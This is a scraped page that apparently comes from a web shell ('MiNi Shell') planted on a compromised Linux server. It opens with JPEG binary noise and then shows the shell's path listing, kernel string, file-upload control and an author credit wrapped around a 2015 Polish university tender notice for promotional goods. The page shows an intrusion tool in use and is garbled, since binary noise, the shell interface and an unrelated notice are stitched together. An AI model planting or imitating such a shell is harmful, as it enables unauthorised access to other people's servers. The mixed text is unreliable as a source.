JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150723/187564-N-2015.html

<p class="kh_header"><b>Gdańsk: Dostawa materiałów promocyjnych dla Wydziału Zarządzania i Ekonomii Politechniki Gdańskiej</b><br>
<b>Numer ogłoszenia: 187564 - 2015; data zamieszczenia: 23.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Gdańska Wydział Zarządzania i Ekonomii , ul. Narutowicza 11/12, 80-233 Gdańsk, woj. pomorskie, tel. +48 58 348 60 20, faks +48 58 347 24 53.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów promocyjnych dla Wydziału Zarządzania i Ekonomii Politechniki Gdańskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa do siedziby Zamawiającego materiałów promocyjnych dla Wydziału Zarządzania i Ekonomii Politechniki Gdańskiej. Materiały promocyjne mają być wykonane w oparciu o projekty przygotowane przez Wykonawcę na podstawie dostarczonych  projektów przygotowanych przez Zamawiającego wstępnych projektów, które są zawarte w załącznikach: od nr 7 do nr 19.
1.1	Wykonawca dostarczy przedmiot zamówienia  własnym transportem, na własny koszt i na własne ryzyko, w miejsce wskazane przez Zamawiającego.
1.2	Produkty oferowane Zamawiającemu muszą spełniać wszystkie normy stawiane takim towarom przez prawo polskie oraz posiadać odpowiednie pozwolenia dopuszczające do obrotu na terytorium Polski.
1.3	Wykonawca jest zobowiązany do wskazania w ofercie części zamówienia (zakresu), których wykonanie zamierza powierzyć podwykonawcom.
1.4	Zamawiający nie dopuszcza składania ofert wariantowych.
2. Szczegółowy opis przedmiotu zamówienia
Zamawiający używając przy opisie przedmiotu zamówienia nazw marek, producentów, nazw własnych itp. ma na celu wskazanie standardów  jakościowych produktu. Tym samym Zamawiający dopuszcza zastosowanie produktu równoważnego, czyli produktu jakościowo nie gorszego niż wymieniony w SIWZ.
2.1 Przedmiot zamówienia musi być fabrycznie nowy i pochodzić z bieżącej produkcji (wyprodukowane nie wcześniej niż w 2014 roku). 
2.2 Zamawiający wymaga aby przedmiot zamówienia objęty był okresem gwarancji  wy-noszącym co najmniej 12 miesięcy. Gwarancja udzielona przez Wykonawcę nie może ograniczać gwarancji producenta. Okres gwarancji liczony będzie od  daty podpisania protokołu zdawczo-odbiorczego.
2.3	Zamawiający wymaga, aby: 
- zamawiane artykuły były opatrzone nadrukiem wg projektów przygotowanych przez    Zamawiającego wstępnych projektów, które są zawarte w załącznikach od nr 7 do nr 19.
2.4 Wykonawca przed realizacją umowy przedstawi Zamawiającemu do akceptacji wizualizacje nadruku dla każdego rodzaju asortymentu. Zamawiający dokona akceptacji wizualnej lub wskaże poprawki do wizualizacji w terminie do 2 dni roboczych od dnia ich otrzymania.

Kubki 
LP	Cecha	Wymagane parametry
1	OPIS	-kubek ceramiczny,
 -kształt okrągły, prosty walec
- wnętrze granatowe- zgodne ze specyfikacją, zewnętrze białe
- ucho o prostym kształcie, tej samej grubości na całej długości w kolorze wnętrza kubka
- nadruk na 100% do 80% powierzchni:  wysokości i szerokości.
- znak wydziału na spodzie kubka - 
- zdjęcia do nadruku w specyfikacji
- kubek nadający się do zmywania w zmywarce
- zapakowany w biały kartonik z okienkiem
2	LICZBA SZTUK	Nakład podstawowy : 150 sztuk
Prawo opcji: 100 %
3	NADRUK	- pełnokolorowy nadruk bez ograniczeń
-obszar nadruku max. 9cm x 22cm
- załączniki od nr 7 do nr 12 (zdjęcia grzbietów książek w pionie) 
4	MATERIAŁ	Kubek ceramiczny
5	WYMIARY	wysokość    - 10,5 cm (+/- 5 mm)
średnica      - 8,2 cm (+/- 5 mm)
ucho - długość min. 10.5 cm  max. 11,5 cm (+/- 5 mm)

6	KOLOR	Kolor: 
-biały zewnątrz,
-granatowy wewnątrz [ RGB: 64,81,120] CMYK [C:100%, M:72%, Y:0%, K:38%.]
-ucho granatowe [ RGB: 64,81,120] CMYK -  j.w.
-kolory znaku WZiE
 granatowy [ RGB: 64,81,120] CMYK [C:100%, M:72%, Y:0%, K:38%.]
czerwony [RGB: 203, 96, 77]CMYK [C:0%, M:69%, Y:100%, K:6%.]

7	WIZUALIZACJA	 
8	OPAKOWANIE	 

Ołówek
LP	Cecha	Wymagane parametry
1	OPIS	-drewniany ołówek grafitowy, ergonomiczny trójkątny, trójboczny
-miękka strefa uchwytu GRIP, pokryta drobnymi punkcikami o właściwościach antypoślizgowych
-grafit HB
-ołówek z gumką na końcu ołówka
-ołówek naostrzony
2	LICZBA SZTUK	Nakład podstawowy : 1000 sztuk
Prawo opcji: 300 sztuk
3	NADRUK	- Ołówek popielaty, 
-napis na dwóch  z trójkątnych ścian
- napis1     http://zie.pg.edu.pl
-napis2   www.facebook.com/ziepg
4	MATERIAŁ	drewniany
5	WYMIARY	-długość 18 cm (+/- 5 mm)
-  6 cm między  gumką a końcem  - pole napisu 
6	KOLOR	Kolor srebrny/ popielaty, gumka granatowa, napis czerwony  [RGB: 203, 96, 77]
7	WIZUALIZACJA	 



Długopis
LP	Cecha	Wymagane parametry
1	OPIS	- długopis automatyczny
- obudowa metalowa
-  przycisk połączony z klipsem umożliwiającym zaczepienie długopisu, np. o papier
- na długości 1/3 długopisu mogą znajdować się dwie cienkie obręcze
- przycisk, klips oraz obręcze wykonane z metalu 
- wkład długopisu niebieski
2	LICZBA SZTUK	Nakład podstawowy : 1000 sztuk
Prawo opcji: 300 sztuk
3	NADRUK	Grawer  laserowy- kolor biały - załącznik nr  19
4	MATERIAŁ	aluminium
5	WYMIARY	 145 mm x 7 mm (+/- 5 mm)
6	KOLOR	srebrny
7	WIZUALIZACJA	 

Torba 
LP	Cecha	Wymagane parametry
1	OPIS	- kształt  prostokątny
- brzegi obrębione, górne wykończenie podwójne, 
- rączki szyte, podwójny materiał, wzmacniane, 
- dno wzmacniane, podwójne
- na wewnętrznej stronie jednej z największych płaszczyzn  naszyta kieszonka  
- nadruk na największych płaszczyznach, zajmujący  od 100 do 80% powierzchni -  zgodny z dostarczonymi zdjęciami,  3 propozycje wizualizacji
- nadruk znaku WZiE i PG  na jednym z boków- zgodnie ze zdjęciem
2	LICZBA SZTUK	Nakład podstawowy : 200 sztuk
Prawo opcji: 100 %
3	NADRUK	- nadruk zdjęć - leżące książki -na obu największych płaszczyznach, zajmujący  od 100 do 80% powierzchni -  zgodny z dostarczonymi zdjęciami załącznik nr 7-12
- nadruk znaku WZiE i PG  na jednym z boków- zgodnie ze zdjęciem załącznik nr 14 i załącznik 17 
4	MATERIAŁ	surowiec - bawełniany canvas ( płótno żaglowe ) 300g lub równoważne
5	WYMIARY	-szerokość 35 cm, wysokość 40 cm, boki i dno 8 cm (+/- 5 mm)
-wewnętrzna kieszonka szer.15 cm. Wysokość 10 cm (+/- 5 mm)
- rączki  długość 68cm, szer. 3 cm (+/- 5 mm)

6	KOLOR	Kolor torby  ECRU
kolor zdjęć - pełny, 
kolory znaku WZiE  granatowy [ RGB: 64,81,120] CMYK [C:100%, M:72%, Y:0%, K:38%.]
czerwony [RGB: 203, 96, 77] CMYK [C:0%, M:69%, Y:100%, K:6%.]
kolor znaku PG granatowy: [CMYK: C: 100%,M:55%, Y:0%, K;55%]
7	WIZUALIZACJA	 

USB plastikowy - spinacz
LP	Cecha	Wymagane parametry
1	OPIS	Interfejs: USB 2.0
Pojemność  4GB
Prędkość pracy: odczyt minimum 20 MB/s., zapis minimum 5 MB/s
Wytrzymałość: wodoodporny  (IP55)
Gwarancja: 24 miesiące
Obsługiwane systemy operacyjne: Windows Xp / Windows7 / Linux 
2	LICZBA SZTUK	Nakład podstawowy : 150 sztuk 
Minimalne prawo opcji: 100 %
3	NADRUK	Logotyp  WZiE w pliku załącznik nr 13
4	MATERIAŁ	Tworzywo sztuczne, plastik
5	WYMIARY	 Długość 50mm x szerokość  18mm x wysokość  5mm (+/- 5 mm)
6	KOLOR	Kolor: biały
7	WIZUALIZACJA	 


USB metal - spinacz
LP	Cecha	Wymagane parametry
1	OPIS	Interfejs: USB 2.0
Pojemność  4GB
Prędkość pracy: odczyt minimum 20 MB/s., zapis minimum 5 MB/s
Wytrzymałość: wodoodporny  (IP55)
Gwarancja: 24 miesiące
Obsługiwane systemy operacyjne: Windows Xp / Windows7 / Linux 
Pudełko  koloru  granatowego na  nim  nadruk  logo  w  kolorze  srebrnym - załącznik nr 14
2	LICZBA SZTUK	Nakład podstawowy : 100 sztuk 
Minimalne prawo opcji: 100 %
3	NADRUK	Logotyp  WZiE w pliku - załącznik nr 13
4	MATERIAŁ	Metal
5	WYMIARY	 Długość 50mm x szerokość  18mm x wysokość  5mm (+/- 5 mm)
6	KOLOR	Kolor: srebrny
7	WIZUALIZACJA	 
8	OPAKOWANIE	 
USB bursztynowy 
LP	Cecha	Wymagane parametry
1	OPIS	Interfejs: USB 2.0
Pojemność  16GB
Prędkość pracy: odczyt minimum 20 MB/s., zapis minimum 5 MB/s
Wytrzymałość: wodoodporny  (IP55)
Gwarancja: 24 miesiące
Obsługiwane systemy operacyjne: Windows Xp / Windows7 / Linux 
Pudełko koloru granatowego na nim nadruk logo w kolorze srebrnym - załącznik nr 14
2	LICZBA SZTUK	Nakład podstawowy : 15 sztuk 
Minimalne prawo opcji: 100 %
3	NADRUK	Logotyp  WZiE w pliku załącznik nr 8 nadruk srebrny na pudełku
4	MATERIAŁ	Srebro, bursztyn
5	WYMIARY	 Wysokość 31,6 mm x szerokość  16,4 mm x głębokość  6 mm (+/- 5 mm)
6	KOLOR	Kolor:  bursztynowy, pudełko granatowe
7	WIZUALIZACJA	 
8	OPAKOWANIE	 
USB - karta płatnicza
LP	Cecha	Wymagane parametry
1	OPIS	Interfejs: USB 2.0
Pojemność  16GB
Prędkość pracy: odczyt minimum 20 MB/s., zapis minimum 5 MB/s
Wytrzymałość: wodoodporny  (IP55)
Gwarancja: 24 miesiące
Obsługiwane systemy operacyjne: Windows Xp / Windows7 / Linux 
2	LICZBA SZTUK	Nakład podstawowy : 50 sztuk 
Minimalne prawo opcji: 100%
3	NADRUK	Logotyp  WZiE w pliku załącznik nr 15 i nr 18
4	MATERIAŁ	Metal
5	WYMIARY	 Wysokość 31,6 mm x szerokość  16,4 mm x głębokość  6 mm (+/- 5 mm)
6	KOLOR	Kolor:  srebrny,  opakowanie przezroczyste
7	WIZUALIZACJA	 
8	OPAKOWANIE	 

Etui do wizytówek
LP	Cecha	Wymagane parametry
1	OPIS	Srebrne etui do wizytówek, każde etui zapakowane w osobny kartonik.

2	LICZBA SZTUK	Nakład podstawowy: 800 sztuk

3	NADRUK	Logotyp  WZiE w pliku - załącznik nr 14
Logo  laserowo grawerowane na wieczku
4	MATERIAŁ	Matowe aluminium
5	WYMIARY	 93 x 57 x 5 mm (+/- 5 mm)
6	KOLOR	Kolor: srebrny
7	WIZUALIZACJA	 


4. W przypadku zaistnienia konieczności zwiększenia zakresu zamówienia Zamawiający skorzysta z prawa opcji zgodnie z zapisami powyżej.
5. W celu potwierdzenia, ze oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego Wykonawca zobowiązany jest złożyć:
OPIS - dokumentację techniczną dotyczącą materiałów promocyjnych będących przedmiotem zamówienia. Przez dokumentację techniczną rozumie się specyfikacje techniczne udostępnione przez producentów i dystrybutorów lub własne opisy i informacje sporządzone przez Wykonawcę na temat oferowanego wyrobu z podaniem producenta, modelu, typu. Specyfikacje techniczne muszą potwierdzać wszystkie wymagane minimalne parametry wyszczególnione w opisie przedmiotu zamówienia niniejszej SIWZ, opisy w języku angielskim mają być dostarczone wraz z tłumaczeniem na język polski. 
Zamawiający nie  dopuszcza możliwość składania ofert częściowych..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.29.41.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 21.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Do prowadzenia działalności w zakresie niniejszego przedmiotu zamówienia nie jest wymagane posiadanie specjalnych uprawnień. Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony na podstawie złożonego przez Wykonawcę oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin dostawy - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, dotyczących:
zmiany stawki VAT
Wynagrodzenie Wykonawcy może ulec zmianie w przypadku obniżenia lub podwyższenia stawki podatku VAT na skutek zmiany obowiązujących przepisów. 
Płatność  będzie  się  odbywać  z  uwzględnieniem  stawki VAT obowiązującej w dniu wystawienia faktury.
zmiany lub rezygnacji z Podwykonawcy 
Wykonawca  może  dokonać  zmiany  lub  zrezygnować z Podwykonawcy, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1, Wykonawca  jest  zobowiązany  wykazać   Zamawiającemu,   iż   proponowany  inny Podwykonawca  (lub  Wykonawca  samodzielnie)  spełnia  dany  warunek  udziału   w postępowaniu  w  stopniu  nie  mniejszym  niż  wymagany w trakcie postępowania o udzielenie zamówienia. Obowiązek wykazania powyższych okoliczności w sposób nie budzący wątpliwości Zamawiającemu spoczywa na Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dzp.pg.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> POLITECHNIKA GDAŃSKA Wydział Zarządzania i Ekonomii, ul. G. Narutowicza 11/12 (siedziba: ul. Traugutta 79), 80-233 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2015 godzina 10:30, miejsce: POLITECHNIKA GDAŃSKA Wydział Zarządzania i Ekonomii, ul. G. Narutowicza 11/12 (siedziba: ul. Traugutta 79), 80-233 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com